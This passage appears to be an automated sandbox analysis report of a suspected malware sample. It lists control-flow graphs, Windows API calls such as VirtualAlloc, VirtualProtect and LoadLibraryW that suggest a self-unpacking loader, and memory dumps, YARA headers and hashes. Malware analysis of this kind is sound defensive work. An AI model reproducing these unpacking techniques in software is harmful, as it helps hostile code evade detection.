                                                                                                                                              control_flow_graph 70 5a003c-5a0047 71 5a0049 70->71 72 5a004c-5a0263 call 5a0a3f call 5a0e0f call 5a0d90 VirtualAlloc 70->72 71->72 87 5a028b-5a0292 72->87 88 5a0265-5a0289 call 5a0a69 72->88 90 5a02a1-5a02b0 87->90 92 5a02ce-5a03c2 VirtualProtect call 5a0cce call 5a0ce7 88->92 90->92 93 5a02b2-5a02cc 90->93 99 5a03d1-5a03e0 92->99 93->90 100 5a0439-5a04b8 VirtualFree 99->100 101 5a03e2-5a0437 call 5a0ce7 99->101 103 5a04be-5a04cd 100->103 104 5a05f4-5a05fe 100->104 101->99 106 5a04d3-5a04dd 103->106 107 5a077f-5a0789 104->107 108 5a0604-5a060d 104->108 106->104 110 5a04e3-5a0505 106->110 111 5a078b-5a07a3 107->111 112 5a07a6-5a07b0 107->112 108->107 113 5a0613-5a0637 108->113 121 5a0517-5a0520 110->121 122 5a0507-5a0515 110->122 111->112 114 5a086e-5a08be LoadLibraryA 112->114 115 5a07b6-5a07cb 112->115 116 5a063e-5a0648 113->116 120 5a08c7-5a08f9 114->120 118 5a07d2-5a07d5 115->118 116->107 119 5a064e-5a065a 116->119 123 5a07d7-5a07e0 118->123 124 5a0824-5a0833 118->124 119->107 125 5a0660-5a066a 119->125 128 5a08fb-5a0901 120->128 129 5a0902-5a091d 120->129 130 5a0526-5a0547 121->130 122->130 131 5a07e2 123->131 132 5a07e4-5a0822 123->132 127 5a0839-5a083c 124->127 126 5a067a-5a0689 125->126 133 5a068f-5a06b2 126->133 134 5a0750-5a077a 126->134 127->114 135 5a083e-5a0847 127->135 128->129 136 5a054d-5a0550 130->136 131->124 132->118 137 5a06ef-5a06fc 133->137 138 5a06b4-5a06ed 133->138 134->116 139 5a084b-5a086c 135->139 140 5a0849 135->140 142 5a05e0-5a05ef 136->142 143 5a0556-5a056b 136->143 146 5a074b 137->146 147 5a06fe-5a0748 137->147 138->137 139->127 140->114 142->106 144 5a056f-5a057a 143->144 145 5a056d 143->145 148 5a059b-5a05bb 144->148 149 5a057c-5a0599 144->149 145->142 146->126 147->146 154 5a05bd-5a05db 148->154 149->154 154->136
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_5a0000_bbdeaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 389 4171e6-4171ed 390 4171f0-417200 389->390 391 417202 390->391 392 417208-41720b 390->392 391->392 392->390 393 41720d-41722e LoadLibraryW call 416bd0 call 416e20 392->393 398 417230-417237 393->398 399 417239-417247 MoveFileA 398->399 400 41724d-417253 398->400 399->400 401 417255 call 416bc0 400->401 402 41725a-417261 400->402 401->402 405 417270-417277 402->405 406 417263-41726a InterlockedDecrement 402->406 405->398 407 417279-417289 405->407 406->405 408 417290-4172a0 407->408 410 4172a2 408->410 411 4172a9-4172ac 408->411 410->411 411->408 412 4172ae-4172b9 411->412 413 4172c0-4172c5 412->413 414 4172c7-4172cd 413->414 415 4172cf-4172d5 413->415 414->415 416 4172d7-4172e4 414->416 415->413 415->416
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNELBASE(00419374), ref: 00417212
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041726A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementFileInterlockedLibraryLoadMove
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 418655872-956986773
                                                                                                                                              • Opcode ID: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
                                                                                                                                              • Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
                                                                                                                                              • Opcode Fuzzy Hash: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
                                                                                                                                              • Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 418 416bd0-416d10 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC
                                                                                                                                              • VirtualProtect.KERNELBASE(00512B2C,00512CE4,00000040,?), ref: 00416D0B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                                              • Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
                                                                                                                                              • Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 436 6b08c0-6b08d9 437 6b08db-6b08dd 436->437 438 6b08df 437->438 439 6b08e4-6b08f0 CreateToolhelp32Snapshot 437->439 438->439 440 6b08f2-6b08f8 439->440 441 6b0900-6b090d Module32First 439->441 440->441 446 6b08fa-6b08fe 440->446 442 6b090f-6b0910 call 6b057f 441->442 443 6b0916-6b091e 441->443 447 6b0915 442->447 446->437 446->441 447->443
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006B08E8
                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 006B0908
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_6ad000_bbdeaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction ID: 17c882ec551cdb7da65128ccd59f0b6069963c607a43712cc5b5f13b9c0995f9
                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction Fuzzy Hash: 85F0C2726003146FF7203AB4988CBEF7AE9AF48364F101229E646911C0DA70E9854B60

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 449 5a0e0f-5a0e24 SetErrorMode * 2 450 5a0e2b-5a0e2c 449->450 451 5a0e26 449->451 451->450
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_5a0000_bbdeaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 452 401991-4019ed call 401240 Sleep 464 4019f3-4019f5 452->464 465 4019ee call 4014c4 452->465 466 401a04-401a52 call 401240 464->466 467 4019f7-4019ff call 4015b7 464->467 465->464 467->466
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                              • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                                              • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                              • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 481 4019a9-4019ed call 401240 Sleep 493 4019f3-4019f5 481->493 494 4019ee call 4014c4 481->494 495 401a04-401a52 call 401240 493->495 496 4019f7-4019ff call 4015b7 493->496 494->493 496->495
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                              • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                                              • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                              • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 510 4019af-4019ed call 401240 Sleep 517 4019f3-4019f5 510->517 518 4019ee call 4014c4 510->518 519 401a04-401a52 call 401240 517->519 520 4019f7-4019ff call 4015b7 517->520 518->517 520->519
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                              • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                                              • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                              • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                              • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                                              • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                              • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006B05D0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_6ad000_bbdeaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction ID: 7803fdbe979b4cb0d16eaad0a0a003873bfc5bdaa5bb528a97cf3b6bd0f47886
                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction Fuzzy Hash: 89113C79A40208EFDB01DF98C985E99BFF5AF08350F158094F9489B362E371EA90DF84
                                                                                                                                              APIs
                                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00512CE4,004171C7), ref: 00416BA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                              • Opcode ID: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
                                                                                                                                              • Instruction ID: 615a9cd2e73dd742d4f8b12f5f73b1ecb849c910c1908f7c89a030002a05c084
                                                                                                                                              • Opcode Fuzzy Hash: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
                                                                                                                                              • Instruction Fuzzy Hash: A7B092B0144200ABD3418FB0AD44B943BA4E318302F028115F600811A0CA201818AF14
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00416E8E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
                                                                                                                                              • Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
                                                                                                                                              • Opcode Fuzzy Hash: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
                                                                                                                                              • Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0.4%
                                                                                                                                              Total number of Nodes:1395
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 5400 403ce1 5401 403ce4 5400->5401 5404 40602a 5401->5404 5405 406049 5404->5405 5409 406050 5404->5409 5407 4029cc __NMSG_WRITE 67 API calls 5405->5407 5407->5409 5416 403ebd 5409->5416 5410 406061 _memset 5412 406139 5410->5412 5414 4060f9 SetUnhandledExceptionFilter UnhandledExceptionFilter 5410->5414 5413 40165a _raise 67 API calls 5412->5413 5415 406140 5413->5415 5414->5412 5417 40333e __decode_pointer 6 API calls 5416->5417 5418 403ec8 5417->5418 5418->5410 5419 403eca 5418->5419 5422 403ed6 __initptd 5419->5422 5420 403f32 5421 403f13 5420->5421 5426 403f41 5420->5426 5425 40333e __decode_pointer 6 API calls 5421->5425 5422->5420 5422->5421 5423 403efd 5422->5423 5429 403ef9 5422->5429 5424 403511 __getptd_noexit 67 API calls 5423->5424 5427 403f02 _siglookup 5424->5427 5425->5427 5428 4019d4 __set_error_mode 67 API calls 5426->5428 5431 403fa8 5427->5431 5433 40165a _raise 67 API calls 5427->5433 5434 403f0b __initptd 5427->5434 5430 403f46 5428->5430 5429->5423 5429->5426 5432 403997 __set_error_mode 6 API calls 5430->5432 5435 401cb7 __lock 67 API calls 5431->5435 5437 403fb3 5431->5437 5432->5434 5433->5431 5434->5410 5435->5437 5436 403335 _raise 6 API calls 5438 403fe8 5436->5438 5437->5436 5437->5438 5440 40403e 5438->5440 5441 404044 5440->5441 5442 40404b 5440->5442 5444 401bdd LeaveCriticalSection 5441->5444 5442->5434 5444->5442 5588 406021 5589 4013d4 __amsg_exit 67 API calls 5588->5589 5590 406028 5589->5590 5468 401882 5471 40472b 5468->5471 5470 401887 5470->5470 5472 404750 5471->5472 5473 40475d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 5471->5473 5472->5473 5474 404754 5472->5474 5473->5474 5474->5470 5097 401843 5098 401852 5097->5098 5099 401858 5097->5099 5103 40165a 5098->5103 5106 40167f 5099->5106 5102 40185d __initptd 5104 401518 _doexit 67 API calls 5103->5104 5105 40166b 5104->5105 5105->5099 5107 401518 _doexit 67 API calls 5106->5107 5108 40168a 5107->5108 5108->5102 5475 405504 5485 405488 5475->5485 5478 40552f setSBCS 5479 401000 __putwch_nolock 5 API calls 5478->5479 5481 4056e7 5479->5481 5480 405573 IsValidCodePage 5480->5478 5482 405585 GetCPInfo 5480->5482 5482->5478 5484 405598 _memset __setmbcp_nolock 5482->5484 5492 405251 GetCPInfo 5484->5492 5486 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 5485->5486 5487 40549c 5486->5487 5488 4054c5 5487->5488 5489 4054a7 GetOEMCP 5487->5489 5490 4054ca GetACP 5488->5490 5491 4054b7 5488->5491 5489->5491 5490->5491 5491->5478 5491->5480 5491->5484 5495 405285 _memset 5492->5495 5501 405337 5492->5501 5493 4069ab ___crtGetStringTypeA 91 API calls 5494 4052f2 5493->5494 5502 4067ac 5494->5502 5495->5493 5497 401000 __putwch_nolock 5 API calls 5499 4053e2 5497->5499 5499->5484 5500 4067ac ___crtLCMapStringA 102 API calls 5500->5501 5501->5497 5503 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 5502->5503 5504 4067bf 5503->5504 5507 406407 5504->5507 5508 406428 LCMapStringW 5507->5508 5511 406443 5507->5511 5509 40644b GetLastError 5508->5509 5508->5511 5509->5511 5510 406641 5513 406dfc ___ansicp 91 API calls 5510->5513 5511->5510 5512 40649d 5511->5512 5514 4064b6 MultiByteToWideChar 5512->5514 5537 406638 5512->5537 5515 406669 5513->5515 5521 4064e3 5514->5521 5514->5537 5519 406682 5515->5519 5520 40675d LCMapStringA 5515->5520 5515->5537 5516 401000 __putwch_nolock 5 API calls 5517 405312 5516->5517 5517->5500 5518 4064fc __alloca_probe_16 5523 406534 MultiByteToWideChar 5518->5523 5518->5537 5522 406e45 ___convertcp 74 API calls 5519->5522 5553 4066b9 5520->5553 5521->5518 5525 40109e _malloc 67 API calls 5521->5525 5526 406694 5522->5526 5527 40654d LCMapStringW 5523->5527 5548 40662f 5523->5548 5524 406784 5534 403235 __fcloseall 67 API calls 5524->5534 5524->5537 5525->5518 5530 40669e LCMapStringA 5526->5530 5526->5537 5528 40656e 5527->5528 5527->5548 5532 406577 5528->5532 5533 4065a0 5528->5533 5529 403235 __fcloseall 67 API calls 5529->5524 5535 4066c0 5530->5535 5530->5553 5531 406141 __crtGetStringTypeA_stat 67 API calls 5531->5537 5536 406589 LCMapStringW 5532->5536 5532->5548 5542 4065bb __alloca_probe_16 5533->5542 5544 40109e _malloc 67 API calls 5533->5544 5534->5537 5541 40109e _malloc 67 API calls 5535->5541 5543 4066d1 _memset __alloca_probe_16 5535->5543 5536->5548 5537->5516 5538 4065ef LCMapStringW 5539 406607 WideCharToMultiByte 5538->5539 5540 406629 5538->5540 5539->5540 5545 406141 __crtGetStringTypeA_stat 67 API calls 5540->5545 5541->5543 5542->5538 5542->5548 5546 40670f LCMapStringA 5543->5546 5543->5553 5544->5542 5545->5548 5549 40672b 5546->5549 5550 40672f 5546->5550 5548->5531 5552 406141 __crtGetStringTypeA_stat 67 API calls 5549->5552 5551 406e45 ___convertcp 74 API calls 5550->5551 5551->5549 5552->5553 5553->5524 5553->5529 5591 4035a4 5592 4035b0 __initptd 5591->5592 5593 4035c8 5592->5593 5594 4036b2 __initptd 5592->5594 5595 403235 __fcloseall 67 API calls 5592->5595 5596 4035d6 5593->5596 5597 403235 __fcloseall 67 API calls 5593->5597 5595->5593 5598 4035e4 5596->5598 5599 403235 __fcloseall 67 API calls 5596->5599 5597->5596 5600 4035f2 5598->5600 5601 403235 __fcloseall 67 API calls 5598->5601 5599->5598 5602 403235 __fcloseall 67 API calls 5600->5602 5604 403600 5600->5604 5601->5600 5602->5604 5603 403235 __fcloseall 67 API calls 5605 40360e 5603->5605 5604->5603 5604->5605 5606 403235 __fcloseall 67 API calls 5605->5606 5607 40361c 5605->5607 5606->5607 5608 40362d 5607->5608 5609 403235 __fcloseall 67 API calls 5607->5609 5610 401cb7 __lock 67 API calls 5608->5610 5609->5608 5611 403635 5610->5611 5612 403641 InterlockedDecrement 5611->5612 5613 40365a 5611->5613 5612->5613 5615 40364c 5612->5615 5627 4036be 5613->5627 5615->5613 5617 403235 __fcloseall 67 API calls 5615->5617 5617->5613 5618 401cb7 __lock 67 API calls 5619 40366e 5618->5619 5620 40369f 5619->5620 5622 405a79 ___removelocaleref 8 API calls 5619->5622 5630 4036ca 5620->5630 5625 403683 5622->5625 5624 403235 __fcloseall 67 API calls 5624->5594 5625->5620 5626 4058a1 ___freetlocinfo 67 API calls 5625->5626 5626->5620 5633 401bdd LeaveCriticalSection 5627->5633 5629 403667 5629->5618 5634 401bdd LeaveCriticalSection 5630->5634 5632 4036ac 5632->5624 5633->5629 5634->5632 5554 401b86 5555 401b96 5554->5555 5556 401ba2 DeleteCriticalSection 5555->5556 5557 401bba 5555->5557 5558 403235 __fcloseall 67 API calls 5556->5558 5559 401bcc DeleteCriticalSection 5557->5559 5560 401bda 5557->5560 5558->5555 5559->5557 5445 4171e6 5446 4171f0 LoadLibraryW 5445->5446 5448 416bd0 2 API calls 5446->5448 5449 41721d 5448->5449 5450 416e20 13 API calls 5449->5450 5452 417222 5450->5452 5451 417239 LocalAlloc GetStdHandle MoveFileA 5451->5452 5452->5451 5453 417263 InterlockedDecrement 5452->5453 5454 417279 5452->5454 5453->5452 5455 4172a2 GetFileAttributesW 5454->5455 5456 4172ae 5454->5456 5455->5454 5457 401000 __putwch_nolock 5 API calls 5456->5457 5458 4172e1 5457->5458 5561 404107 5562 404143 5561->5562 5563 404119 5561->5563 5563->5562 5565 403cbd 5563->5565 5566 403cc9 __initptd 5565->5566 5567 40358a __getptd 67 API calls 5566->5567 5568 403cce 5567->5568 5569 40602a _abort 69 API calls 5568->5569 5570 403cf0 __initptd 5569->5570 5570->5562 5635 404d28 5636 404d3a 5635->5636 5638 404d48 @_EH4_CallFilterFunc@8 5635->5638 5637 401000 __putwch_nolock 5 API calls 5636->5637 5637->5638 5109 404149 SetUnhandledExceptionFilter 5639 407c29 5640 407c36 5639->5640 5641 40488f __calloc_crt 67 API calls 5640->5641 5642 407c50 5641->5642 5643 40488f __calloc_crt 67 API calls 5642->5643 5644 407c69 5642->5644 5643->5644 5110 40584a 5113 401bdd LeaveCriticalSection 5110->5113 5112 405851 5113->5112 5645 40182f 5648 403d08 5645->5648 5649 403511 __getptd_noexit 67 API calls 5648->5649 5650 401840 5649->5650 5114 4062d0 RtlUnwind 5571 402810 5572 402849 5571->5572 5573 40283c 5571->5573 5574 401000 __putwch_nolock 5 API calls 5572->5574 5575 401000 __putwch_nolock 5 API calls 5573->5575 5581 402859 __except_handler4 __IsNonwritableInCurrentImage 5574->5581 5575->5572 5576 4028dc 5577 4028b2 __except_handler4 5577->5576 5578 4028cc 5577->5578 5580 401000 __putwch_nolock 5 API calls 5577->5580 5579 401000 __putwch_nolock 5 API calls 5578->5579 5579->5576 5580->5578 5581->5576 5581->5577 5587 404dba RtlUnwind 5581->5587 5583 40292b __except_handler4 5584 40295f 5583->5584 5585 401000 __putwch_nolock 5 API calls 5583->5585 5586 401000 __putwch_nolock 5 API calls 5584->5586 5585->5584 5586->5577 5587->5583 5651 4033b0 TlsAlloc 4014 401734 4015 401745 4014->4015 4050 40299c HeapCreate 4015->4050 4018 401784 4060 4036d3 GetModuleHandleW 4018->4060 4019 40177d 4052 4016dc 4019->4052 4023 401795 __RTC_Initialize 4093 4044d7 4023->4093 4024 4016dc _fast_error_exit 67 API calls 4024->4023 4026 4017a3 4027 4017af GetCommandLineW 4026->4027 4108 4013d4 4026->4108 4115 40447a GetEnvironmentStringsW 4027->4115 4031 4017be 4121 4043cc GetModuleFileNameW 4031->4121 4033 4017c8 4034 4017d3 4033->4034 4035 4013d4 __amsg_exit 67 API calls 4033->4035 4125 40419d 4034->4125 4035->4034 4038 4017e4 4137 401493 4038->4137 4040 4013d4 __amsg_exit 67 API calls 4040->4038 4041 4017eb 4042 4013d4 __amsg_exit 67 API calls 4041->4042 4043 4017f6 __wwincmdln 4041->4043 4042->4043 4143 4172f0 4043->4143 4045 401817 4046 401825 4045->4046 4146 401644 4045->4146 4149 401670 4046->4149 4049 40182a __initptd 4051 